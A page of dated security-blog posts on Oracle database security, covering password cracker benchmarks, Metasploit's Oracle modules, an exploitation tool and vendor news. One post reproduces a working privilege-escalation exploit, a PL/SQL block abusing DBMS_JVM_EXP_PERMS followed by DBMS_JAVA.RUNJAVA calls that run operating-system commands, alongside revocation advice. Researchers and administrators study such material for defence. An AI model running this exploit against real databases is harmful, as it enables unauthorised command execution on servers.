5 Feb 2010 von Alexander Kornbrust.

Blackhat removed the video from David Litchfield (containing the 0day exploit code for 11g) from their website. But it’s too late because the 0day code for 11g can be found in the meantime in many places.

The video was downloaded several times and it’s just a question of time until it re-appears…

BTW Oracle 10.2.0.4 with all security patches is vulnerable against this issue too. But the exploit must be modified a little bit.

Geschrieben in 11g, Exploit, David Litchfield, Allgemein | Drucken | Keine Kommentare »

4 Feb 2010 von Alexander Kornbrust.

I just read on Sumit Siddarth’s (Sid) blog that the video recording from David Litchfield’s BH presentation is was online.

<<UPDATE>> The video was removed from the Blackhat website. <<UPDATE>>

David showed how to escalate Java privileges using DBMS_JVM_EXP_PERMS.

DECLARE
POL DBMS_JVM_EXP_PERMS.TEMP_JAVA_POLICY;
CURSOR C1 IS SELECT ‘GRANT’,USER(), ‘SYS’,’java.io.FilePermission’,’<<ALL FILES>>‘,’execute’,’ENABLED’ from dual;
BEGIN
OPEN C1;
FETCH C1 BULK COLLECT INTO POL;
CLOSE C1;
DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL);
END;
/

After the Java privilege escalation it is possible to run OS commands using a simple SELECT statement:

select dbms_java.runjava(’oracle/aurora/util/Wrapper c:\\windows\\system32\\cmd.exe /c dir>c:\\out.lst’)from dual;

For security reasons you should revoke the PUBLIC privileges from DBMS_JVM_EXP_PERMS, DBMS_JAVA and DBMS_JAVA_TEST.

I just tested the code on my Linux 11.2.0.1 database and it worked without any problem.

SELECT * from dual where chr(42)=DBMS_JAVA.RUNJAVA(’oracle/aurora/util/Wrapper /bin/touch /tmp/iwashere3′);

Geschrieben in Exploit, David Litchfield | Drucken | Keine Kommentare »

30 Jan 2010 von Alexander Kornbrust.

I came across an interesting article in the German newspaper FAZ. Someone is offering data of 1500 Swiss bank customers (with black money) to the German government for 2.5 Million EURO. A quick check of the tax fraud investigators showed that the data is reliable.

The Return on Invest (ROI) is approx. 100 Mill EUR for the German government (4% for the data thief). Our minister of finance is still thinking if he should make this deal. This would be good for the German government (more money, less taxes for Germans) but bad for the Swiss banking industry.

Geschrieben in Allgemein | Drucken | Keine Kommentare »

6 Dez 2009 von Alexander Kornbrust.

Dennis Yurichev wrote an interesting background article about his FPGA password cracker for Oracle, currently the fastest (known) way to brute force Oracle DES passwords.

Dennis mentioned in the article that “By Oracle’s password standard, first password symbol is always Latin character (one of 26)”. This is not exactely correct if you enclose the password in double quotes. In this case all characters are allowed. I tested the FPGA cracker with the following test case and it seems not to crack the hash (currently still running).

SQL> grant dba to x identified by “1″;

USERNAME                       PASSWORD
—————————— ——————————
X                              4D91C057D0C4D801

If you want to try his FPGA cracker here is the link.
Well done and very interesting article Dennis. The only thing I would be interestedis the price of the FPGA hardware.

Geschrieben in Tools, passwords, Oracle Security | Drucken | Keine Kommentare »

29 Nov 2009 von Alexander Kornbrust.

This time I want to present a new super-fast password cracker.Ivan Golubev released a new version of his password cracker IGhashGPU.  I know the tool for a while but in older versions of IGHASHGPU Oracle SHA1 passwords were not supported.

The new version 0.62 supports now also Oracle 11g hashes (SHA1 + salt). The remarkable thing is the speed of cracking passwords. Ivan’s cracker is using the GPU for cracking the passwords. Without a GPU (NVidia or ATI) or within  a virtual machine the tool is not working.

On a dual ATI 5970 configuration (forum entry) the tool can crack approx. 790 (!!!) Million hashes per second. A single ATI 4850 can achieve more than 300 Mill. hashes per second. This means that the new 11g password algorithm can be cracked approx 130 times faster than the old DES algorithm. I am not sure if it was a good idea from Oracle to use such a standard algorithm like SHA1 because this is together with MD5 one of the most optimized algorithms.

Here is a short comparison between cracking old Oracle DES based passwords and new Oracle 11g SHA1 based passwords. I used the fasted software BF password cracker for Oracle DES (Repscan  from Red-Database-Security or woraauthbf, both with approx. 6 Mill hashes on a Core i7) and compared it with the configuration of running IGHASHGPU on a dual 5970 configuration (790 Mill hashes per second).

Here are some benchmark numbers. I know that 11g supports case sensitive passwords but from my experience most people use normally lowercase passwords with the first character converted to uppercase.In such a case it is not necessary to crack the entire key space.

26 characters, length 6:   DES: 53 seconds,  SHA1: 0.4 seconds

26 characters, length 7:   DES: 23 min,  SHA1: 10 seconds

26 characters, length 8:   DES: 10 h,  SHA1: 4.6 minutes

26 characters, length 9:   DES: 11 days,  SHA1: 2 hours

26 characters, length 10:   DES: 283 days,  SHA1: 2 days

If you are interested to download the tool you can get it from here.

Geschrieben in Tools, 11g | Drucken | 2 Kommentare »

25 Nov 2009 von Alexander Kornbrust.

Shaomin Wang from Oracle has posted an interesting blog entry “How Oracle controls access to security vulnerabilities“. There are 3 different access types: Default Access, Global Access and Hierarchical Access.

Depending from the role inside of Oracle (e.g. Global Product Security staff, normal employees or their managers) people have the right to view an individual security bug or all security bugs.

This is a big improvement comparing to the time when I was an Oracle employee several years ago. At that time everybody inside of Oracle had access to security bug information.

The only problem nowadays are security bugs which are not marked as security bugs because Oracle support employees are not aware of the security impact of a normal bug. These bugs are often accessible via MyOracleSupport even for Oracle customers.

Geschrieben in Allgemein | Drucken | Keine Kommentare »

17 Nov 2009 von Alexander Kornbrust.

Metasploit 3.3, the leading exploit framework is out. Here an extract from the Metasploit blog:

“Oracle exploit support has been implemented through a tag-team effort between MC and Chris Gates, with assistance from Alexander Kornbrust. Oracle modules have been developed for exploiting TNS protocol stack and Web-based Oracle services, as well as post-authentication database-level privilege escalation flaws. ”

Version 3.3. (release notes) is the largest known ruby application (375,000 lines of code) and comes with some new Oracle features

• Support for the Oracle InstantClient Ruby driver as an exploit mixin
• Extensive support for exploitation and post-exploitation tasks against Oracle databases

Have fun using Metasploit.

Geschrieben in Tools, Exploit, Oracle Security, Allgemein | Drucken | Keine Kommentare »

17 Nov 2009 von Alexander Kornbrust.

In 3 weeks Paul Wright will give an 1 day workshop for SANS (Sat. 5. Dec. in London) about Database Activity Monitoring Systems (DAMS).  Paul will use the free Hedgehog Standard Edition in the class to demonstrate solutions for common problems like user monitoring, defending against public zero days, …

Here is the table of content:

1. Defend against public and zero day attacks via free custom written IDS rules
2. Gain  Compliance
3. User activity monitoring
4. Application monitoring
5. Sensitive data access monitoring
6. Diagnostics prior to changes such as CPU installation.

A case study about using DAMS from Paul Wright is available in the UKOUG Scene magazine (Issue 39).

You should not miss the chance to join this workshop because it can help your company/organization to secure their databases …

Geschrieben in Trainings, Allgemein | Drucken | Keine Kommentare »

13 Nov 2009 von Alexander Kornbrust.

During my research on Russian websites I found a new security tool called “Oracle Security Tools“. This tool offers different methods to exploit Oracle databases.

Here is a list of features

• The privileges escalation of the Oracle users;
• The verification of system accounts concerning the existence of a default password;
• Account compliance test of login=password
• The execution of the PL/SQL code;
• The privileges escalation in the OS Windows 2000/XP/2003 (add a local user as root and holder of remote connection powers);
• The infiltration into the OS and the execution of DOS-commands, holding the administrative rights.
• Viewing the users’ connections to the database and their activity;
• Analyse the external TNS listener.log;

After checking the executable on virustotal I run the program on one of my test VMwares. After switching the russian interface to the english interface I not able to run the tool. I always got the error message:

It seems to be a problem with my vmware system and the mulitple Oracle Homes. After switching to another computer the program was working without problems.

Geschrieben in Tools, Exploit | Drucken | 1 Kommentar »

8 Nov 2009 von Alexander Kornbrust.

I just read that SAP is now certified with Oracle Database Vault. This is an important step to increase the security of SAP systems. Well done Oracle. Let’s see if SAP customers will use this functionality.

The Oracle whitepaper “Best Practices Installing and Configuring Oracle Database Vault in an SAP Environment” decribes the step-by-step installation of database vault in SAP.

The following screenshot from the document (July-2009) contains an information disclosure bug for the Oracle SID (reported by me, fixed by Oracle with CPU July 2007). It seems that the installation of the security component was done with unpatched security software

Geschrieben in SAP, Allgemein | Drucken | Keine Kommentare »